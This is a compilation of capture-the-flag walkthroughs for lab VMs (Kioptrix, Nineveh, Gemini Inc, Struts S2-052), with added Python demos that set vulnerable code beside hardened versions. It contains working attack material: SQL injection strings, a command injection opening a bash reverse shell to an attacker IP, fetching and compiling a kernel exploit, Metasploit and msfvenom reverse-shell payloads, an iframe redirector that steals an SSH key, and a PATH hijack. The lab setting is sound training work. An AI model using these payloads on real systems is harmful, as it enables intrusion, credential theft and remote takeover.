Hack The Kioptrix Level-2 (Boot2Root Challenge)


These Kioptrix VM images are easy challenges. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or the player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to complete the challenges.
You can download it from here and run it in your VM.
Let's start!!
Turn on your attacking machine and use the netdiscover command to scan your local network for the target IP.




Our target is 192.168.1.111, so let's enumerate it and scan its open ports and services. An aggressive nmap scan shows several open ports and the services running on them.
nmap -A 192.168.1.111




Since port 80 was open, we opened the target IP in a web browser and found the following login page.
URL: http://192.168.1.111




Without wasting time we tried the following SQL injection in the login form:
Username: 1' or '1'
Password: 1' or '1'
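Why this bypass works, as an added example that is not part of the original walkthrough: the Python below builds a throwaway SQLite users table (constructed data; the real application's table and column names are not shown on the page and are assumed here) and runs the login query both ways. With username and password set to 1' or '1', the concatenated query's WHERE clause ends in `... or '1'`, which is true for every row, so a user comes back and the check passes. The parameterised version binds the same input as a plain string and finds nothing.

```python
import sqlite3

# The exact string submitted in the walkthrough's login form.
INJECTION = "1' or '1"


def make_db():
    """Constructed in-memory stand-in for the Kioptrix 2 login database.
    Table/column names and the admin password are invented for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cretPass!')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Assumed shape of the vulnerable check: user input is concatenated
    into the SQL text, so quotes and OR become part of the query grammar.
    Resulting clause for the injection:
      WHERE username='1' or '1' AND password='1' or '1'
    which parses as  username='1' OR ('1' AND password='1') OR '1'  -> always true."""
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Hardened check: the driver binds the values, so the input is compared
    literally against the stored username/password and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected :", vulnerable_login(db, INJECTION, INJECTION))
    print("safe, injected       :", safe_login(db, INJECTION, INJECTION))
    print("safe, real creds     :", safe_login(db, "admin", "S3cretPass!"))
```

Run it and compare the two booleans for the injected input; the only change between the two functions is how the values reach the database.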




Great!!! We successfully logged into the Basic Administrative Web Console, where we found a text field that takes a host to ping. Whenever I see a form like this that hands user input to a system utility, I test it for command injection.




Therefore we submitted ;id as the input to enumerate the UID and GID of the user the web server runs as.




The result is apache's UID and GID, which proves the application passes our input straight to a shell and is vulnerable to command injection.




In a new terminal we start a netcat listener on port 8888 to catch the reverse connection, then submit the following payload as user input in the web application (192.168.1.107 is our attacking machine):
127.0.0.1; bash -i >& /dev/tcp/192.168.1.107/8888 0>&1
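The mechanism behind ;id and the reverse-shell payload, as an added example that is not the challenge's own code: the vulnerable function below builds a shell command string from the user's input the way the ping form does, so a semicolon terminates the intended command and starts ours. The hardened version parses the input as an IP address and passes it as a single argv element, so the shell never sees it. To run offline without network access, echo stands in for ping (an assumption of this demo; the real form runs ping).

```python
import ipaddress
import subprocess

# The payload submitted in the walkthrough; kept here only to show that the
# hardened validator refuses it. It is never executed by this script.
PAYLOAD = "127.0.0.1; bash -i >& /dev/tcp/192.168.1.107/8888 0>&1"


def vulnerable_ping(host):
    """Builds a shell string from user input (echo stands in for ping).
    shell=True hands the string to /bin/sh, so ';' ends the first command
    and whatever follows runs as a second command, exactly like ';id'."""
    cmd = "echo pinging " + host
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def safe_ping(host):
    """Validates the input as an IP address and passes it as one argv element.
    No shell is involved, so metacharacters cannot change the command."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("not an IP address: %r" % host)
    result = subprocess.run(["echo", "pinging", str(addr)],
                            capture_output=True, text=True, check=True)
    return result.stdout


def rejects(host):
    """True if the hardened function refuses the value."""
    try:
        safe_ping(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_ping("127.0.0.1; echo INJECTED"), end="")
    print(safe_ping("127.0.0.1"), end="")
    print("hardened version rejects the reverse-shell payload:", rejects(PAYLOAD))
```

The vulnerable call prints two lines, the second produced by the injected command; the hardened call prints one line and raises on anything that is not a bare IP address.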




As soon as the payload is submitted, the netcat session receives a reverse shell from the victim.
Awesome!! We now have the victim's command shell inside netcat; let's dig further for root access.
id
uname -a

Then with the help of Google we searched for a kernel exploit matching the version reported by uname -a and found one on Exploit-DB, entry 9542, a local ring0 (kernel) privilege-escalation exploit for this 2.6 kernel, so we use it to escalate. Before running any kernel exploit, check that the kernel and distribution from uname -a fall within the versions the exploit says it was tested on: a mismatch usually ends in a kernel panic rather than a root shell. The target also needs gcc installed, since we compile on the box.

cd /tmp
wget https://www.exploit-db.com/download/9542 --no-check-certificate
mv 9542 shell.c




gcc shell.c
./a.out
id
whoami

BOOOM!! We now have a root shell on the victim's machine.


Hack The Kioptrix Level-1 VM


These Kioptrix VM images are easy challenges. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or the player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to complete the challenges.
You can download it from here and run it in your VM.
Table of contents
§  Network scanning
§  Enumeration
§  Exploitation
§  Root access
Let's start!!
Turn on your attacking machine and use the netdiscover command to scan your local network for the target IP.




Our target is 192.168.1.109, so let's enumerate it and scan its open ports and services. An aggressive nmap scan shows several open ports and the services running on them.
nmap -A 192.168.1.109




We also scanned the target with Nikto to look for known web vulnerabilities.
It was good to see that multiple vulnerabilities are present in this lab.




The enumeration above makes it clear that this lab can be exploited in more than one way, so without wasting time we use the following Metasploit module to compromise the target VM.
This module exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8 (trans2open). It can exploit the flaw on x86 Linux systems that do not have the noexec stack option set. Note: some older versions of RedHat do not appear to be vulnerable since they do not allow anonymous access to IPC$.
msf > use exploit/linux/samba/trans2open
msf exploit(linux/samba/trans2open) > set rhost 192.168.1.109
msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
msf exploit(linux/samba/trans2open) > set lhost 192.168.1.107
msf exploit(linux/samba/trans2open) > exploit

BOOOM!! We have a command shell on the victim's machine with root access.


Hack The Box : Nineveh Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, "Nineveh", a retired lab from Hack The Box for online penetration-testing practice.
Level: Intermediate
Task: find the user.txt and root.txt files on the victim's machine.
Since these labs are online, they have static IPs. The IP of Nineveh is 10.10.10.43, so let's start with nmap port enumeration.
nmap -A 10.10.10.43
It found ports 80 and 443 open.



We explored port 80 but didn't see any notable clue for the next step.


So next we used Kali's dirb tool to brute-force directories and found some interesting ones, such as http://10.10.10.43/department/, which we then opened in the browser.
dirb http://10.10.10.43 /usr/share/wordlists/dirb/big.txt




It presented a login page, as shown here.


So we tried a few username/password combinations. When we entered username admin and password password, the error was "Invalid Password" rather than a generic failure, which told us that admin is a valid username. An application that returns different errors for a bad username and a bad password lets an attacker enumerate accounts before guessing passwords.




Then, using Burp Suite, we brute-forced the password field with rockyou.txt as the dictionary and obtained the correct combination:
Username: admin
Password: 1q2w3e4r5t



We logged in with these credentials and reached the admin console, as shown.



On the Notes tab we concluded that the displayed text comes from a file somewhere on the system named ninevehNotes.txt, i.e. the page includes a file by path, which makes it a local file inclusion candidate.


Next we explored port 443 and saw the following web page. We also checked its source but found no further hint.


Therefore we again used dirb for a directory brute-force attack and found the /db directory.
dirb https://10.10.10.43 /usr/share/wordlists/dirb/big.txt



We opened the enumerated directory and found a login page for phpLiteAdmin v1.9.


Again we brute-forced the password field on /db with Burp Suite and got the password: password123.



Using password123 we got into the phpLiteAdmin dashboard. With the help of Google we found how to exploit it after reading the description of Exploit-DB 24044 (phpLiteAdmin 1.9.3 remote PHP code injection: a database can be created with a .php file name, and PHP code stored in it as a value is written to disk inside that file).


Following the description of exploit 24044, we create a new database named "ninevehNotes.txt.shell.php", so that the file name both ends in .php and contains the ninevehNotes.txt string the Notes page expects.


Here we created a new table "Demo" with one field.


Now create the entry in field 1 as shown.


Let's create a PHP payload to inject into the new database. We used msfvenom to generate the PHP backdoor:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
Now copy the generated code (from the leading /* onward) and start a multi/handler in a new terminal.


Go to the Insert tab and paste the copied code into the text field given for Value.


At last you will notice that /var/tmp/ninevehNotes.txt.shell.php is the path of your database.


If you remember, we already have access to the admin console and saw the Notes tab; use it to include and execute the backdoor:
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.shell.php
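Why naming the database ninevehNotes.txt.shell.php gets it past the Notes page, as an added example that is not the box's own code: the walkthrough only shows that manage.php includes whatever path the notes parameter names, and that the name had to contain ninevehNotes.txt. The Python below assumes the original check was a substring test (an assumption inferred from the walkthrough, not shown on the page) and sets a hardened version beside it: a bare, allow-listed file name resolved inside a fixed directory (the directory path is also assumed).

```python
import os

# Assumed location of the legitimate notes file; the original page does not
# show where manage.php expects it to live.
NOTES_DIR = "/var/www/html/department/files"
EXPECTED_NAME = "ninevehNotes.txt"


def vulnerable_allows(requested):
    """Assumed original check: accept any path that mentions the expected
    file name. /var/tmp/ninevehNotes.txt.shell.php satisfies it, so the
    phpLiteAdmin database full of PHP gets included and executed."""
    return EXPECTED_NAME in requested


def safe_resolve(requested, base_dir=NOTES_DIR, allowed=(EXPECTED_NAME,)):
    """Hardened check: the parameter must be a bare, allow-listed file name,
    and the resolved path must stay inside the notes directory. Returns the
    absolute path to include."""
    if os.path.basename(requested) != requested or requested not in allowed:
        raise ValueError("refused: %r" % requested)
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, full]) != base:
        raise ValueError("refused: %r escapes %s" % (requested, base))
    return full


def rejects(requested):
    """True if the hardened check refuses the value."""
    try:
        safe_resolve(requested)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    attack = "/var/tmp/ninevehNotes.txt.shell.php"
    print("substring check lets the shell through:", vulnerable_allows(attack))
    print("hardened check refuses it            :", rejects(attack))
    print("hardened check resolves the real note:", safe_resolve(EXPECTED_NAME))
```

The lesson for the defender is that the filter must decide which file to open, not merely inspect the string the client sent; for the attacker, any "must contain X" check is an invitation to put X somewhere in a name you control.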


Meanwhile, return to the Metasploit terminal and wait for the meterpreter session to arrive at the multi/handler:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.25
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

In the image below you can see Meterpreter session 1. But the task isn't finished yet; we still need to dig further for privilege escalation.
meterpreter > sysinfo
meterpreter > cd /home
meterpreter > ls
meterpreter > cd amrois
meterpreter > ls
meterpreter > cat user.txt


After a bit of enumeration we noticed a report directory owned by the user amrois, and that these reports were being generated by chkrootkit every minute, i.e. chkrootkit runs from a scheduled job as root.
With the help of Google we learned that Metasploit has an exploit for this chkrootkit behaviour: load the exploit/unix/local/chkrootkit module as shown in the image, set SESSION to 1 and an arbitrary LPORT such as 4545, then run the module.
This gives another session, a command shell on the target. Typing id now shows uid=0, i.e. root.
id
cd /root
And to list the files in /root type:
ls -lsa
The listing shows a text file; to read it type:
cat root.txt

Congrats!! We hit the goal: both tasks are finished and we have root access.


Hack The Gemini Inc (CTF Challenge)

Gemini Inc has contacted you to perform a penetration testing on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.
Download it from here.
Penetration Methodology
·         Scanning (nmap)
·         Abusing the web application's PDF export for export injection
·         Exploiting the web application via an HTML iframe
·         Stealing the SSH RSA key file
·         Getting a tty shell through ssh login
·         Enumerating files with the SUID bit set
·         Privilege escalation
·         Getting a root shell
·         Completing the task and capturing flag.txt

Let’s GO000!!!

To scan the target IP we use an aggressive scan (-A) across all ports:
nmap -p- -A 192.168.1.103 --open



As a result it found ports 22 and 80 open, and also a directory /test2. Browsing to the target IP showed the following web page.


Then we explored /test2, where we read a message for the admin and also noted the URL given there.


Then at the login form we tried guessing credentials, and on the 5th attempt we logged in successfully with:

Username: admin
Password: password123


After logging into the admin console we checked the actions available to the administrator:
§  Edit profile
§  Export profile



So we ran Export profile to see what it actually exports, but could not tell from its output (shown below), so we decided to capture the request.



With Burp Suite we captured the browser request and sent it to Repeater. The response shows that the export script renders the admin's profile page to PDF with a tool named wkhtmltopdf.



If the web application does not filter user input, the server-side HTML-to-PDF converter ends up rendering attacker-controlled HTML, and every resource that HTML references is fetched by the server, not the browser. One of the most common consequences is arbitrary file read: the attacker can pull sensitive files off the server, /etc/passwd for example. This is the "export injection" class of bug.
We can abuse wkhtmltopdf this way. We wrote the following index.php script (shown in the image), which redirects any request to the file named in the query string, so that the converter follows the redirect to a file:// URL.
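The redirect trick the walkthrough relies on, as an added example and not the author's index.php (which is only shown as an image): a tiny Python HTTP server that answers every GET with a 302 to file:///<requested path>, plus a helper that builds the iframe to paste into the Display name field. When wkhtmltopdf renders the profile on the server it loads the iframe, follows the redirect and embeds the local file in the PDF. The attacker address 192.168.1.107, the listening port and the SSH key path are assumptions for the example.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LISTEN_PORT = 4444              # same port the walkthrough uses for php -S
ATTACKER_IP = "192.168.1.107"   # assumed attacker address; change to yours


def redirect_target(request_path):
    """Map a request such as /?file=/etc/passwd to file:///etc/passwd.
    With no file parameter the default is /etc/passwd."""
    query = parse_qs(urlparse(request_path).query)
    target = query.get("file", ["/etc/passwd"])[0]
    if not target.startswith("/"):
        target = "/" + target
    return "file://" + target


def iframe_payload(target_file, host=ATTACKER_IP, port=LISTEN_PORT):
    """HTML for the Display name field. wkhtmltopdf renders it server-side,
    requests our URL, gets redirected to file:// and embeds the file."""
    return ('<iframe src="http://%s:%d/?file=%s" width="800" height="1200">'
            '</iframe>' % (host, port, target_file))


class Redirector(BaseHTTPRequestHandler):
    """Answer every GET with a 302 whose Location is the file:// URL."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", redirect_target(self.path))
        self.end_headers()


if __name__ == "__main__":
    print("paste into Display name:", iframe_payload("/etc/passwd"))
    # Assumed key path: the page only says the key belongs to gemini1.
    print("for the SSH key        :", iframe_payload("/home/gemini1/.ssh/id_rsa"))
    HTTPServer(("0.0.0.0", LISTEN_PORT), Redirector).serve_forever()
```

Running this in place of php -S gives the same behaviour as the PHP redirect: one payload per file you want, swapping only the file= value. On the defensive side, the fix is for the converter to run with local file access and network access disabled (wkhtmltopdf has options for both) and for the application to render only sanitised HTML.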



To serve it to the victim's machine we launch PHP's built-in web server:
php -S 0.0.0.0:4444



We took the hint for export injection from this source: https://securityonline.info/export-injection-new-server-side-vulnerability/ and proceeded on that basis with the following steps.
Now go to Action -> Edit profile.
Then inject the following HTML (an iframe pointing at our server) into the text field given for Display name.

Now go to Action -> Export profile.


TERRIFIC!!!! It worked as expected and we have the /etc/passwd file in front of us. Here we can clearly see UID/GID 1000 for the user gemini1.


The nmap scan result hinted at an SSH RSA key, and we now know the first username on this VM, so let's try to export the key file.
Now go to Action -> Edit profile.
Then inject the following HTML into the text field given for Display name.



Now go to Action -> Export profile.
After observing the following result, download it quickly.



With the downloaded RSA key, connect to the victim's VM via ssh (ssh refuses a private key that is readable by other users, so restrict the file's permissions to the owner first):
ssh -i login_rsa gemini1@192.168.1.103



Then, without wasting time, search for files with the SUID bit (mode 4000) set using find, for post-exploitation:
find / -perm -u=s -type f 2>/dev/null
Here we can see an interesting file, /usr/bin/listinfo, with SUID permission. Examining it, we notice it probably runs netstat and date by name rather than by absolute path. Hence we can escalate privilege by hijacking the PATH environment variable; you can read our article from here to know more about it.



cd /tmp
echo "/bin/sh" > date
chmod 777 date
echo $PATH
export PATH=/tmp:$PATH
/usr/bin/listinfo
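What the PATH hijack does and how the binary should have been written, as an added example that is not the box's listinfo: the Python below plays the role of a setuid helper that invokes date through the shell by bare name. With a fake date dropped into a directory that is prepended to PATH (a temporary directory stands in for /tmp), the fake runs instead of the real one; in the hardened mode the helper uses an absolute path and a fixed PATH, so the prepended directory is ignored. The fake prints HIJACKED here instead of spawning /bin/sh so the demo is harmless.

```python
import os
import subprocess
import tempfile


def run_date(extra_path_dir=None, hardened=False):
    """Run 'date' the way a setuid helper calling system("date") would.
    extra_path_dir, when given, is prepended to PATH like 'export PATH=/tmp:$PATH'.
    hardened=True shows the fix: an absolute path and a fixed PATH."""
    env = dict(os.environ)
    if extra_path_dir:
        env["PATH"] = extra_path_dir + os.pathsep + env.get("PATH", "")
    if hardened:
        env["PATH"] = "/usr/bin:/bin"   # trusted directories only
        cmd = "/bin/date"               # never resolved through PATH
    else:
        cmd = "date"                    # resolved through the caller's PATH
    out = subprocess.run(cmd, shell=True, env=env, capture_output=True, text=True)
    return out.stdout.strip()


def demo_hijack():
    """Create a fake 'date' in a temp dir (standing in for /tmp) and return
    (output of the vulnerable helper, output of the hardened helper).
    On the real box the fake file contains /bin/sh to get a root shell."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "date")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED\n")
        os.chmod(fake, 0o755)
        return run_date(d), run_date(d, hardened=True)


if __name__ == "__main__":
    hijacked, hardened = demo_hijack()
    print("vulnerable helper ran:", hijacked)
    print("hardened helper ran  :", hardened)
```

The same fix applies to the real binary: call /bin/date and /bin/netstat by absolute path (or reset PATH before the call), and note that a setuid program which trusts any environment variable it inherits is exploitable this way regardless of how carefully the rest of it is written.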

After that we ran the id command and it reported root's uid.



Now let's finish this task by capturing flag.txt from the root directory.
cd root
ls
cat flag.txt


Hack The Vulnhub Pentester Lab: S2-052


Hello friends!! Today we are going to exploit another VM lab, designed by Pentester Lab, which covers exploitation of the Struts S2-052 vulnerability. The REST plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. (The fix shipped in Struts 2.5.13 and 2.3.34, which restrict the classes XStream will deserialize.)
Source: https://cwiki.apache.org/confluence/display/WW/S2-052
Table of contents
§  Introduction
§  Download VM
§  Enumeration (Nmap)
§  Surfing Port 80
§  Exploit the target (Metasploit)
Let's exploit!!
Download it from here and run the VM. Then check its network configuration with the ifconfig command.




Since the target is at 192.168.1.103, let's enumerate it with the following nmap command to identify the running services and their versions.
nmap -A 192.168.1.103
From the nmap scan we noted the following details:
Http-server-header: Apache-coyote/1.1
Http-title: orders
Requested resource: /order.xhtml




So when we opened /order.xhtml in the web browser it showed the following page.




Clicking through to the user Bob takes us to the order 3 page.




Since the author has already stated that this VM is vulnerable to Struts S2-052, we can use the following Metasploit module to directly obtain a command shell on the target VM. The module sends a serialized XML body to the REST endpoint, so TARGETURI must point at a resource the REST plugin handles, here /orders/3.
msf > use exploit/multi/http/struts2_rest_xstream
msf exploit(multi/http/struts2_rest_xstream) > set rhost 192.168.1.103
msf exploit(multi/http/struts2_rest_xstream) > set rport 80
msf exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3
msf exploit(multi/http/struts2_rest_xstream) > exploit
BOOOM!!! We own a command shell on the victim's VM.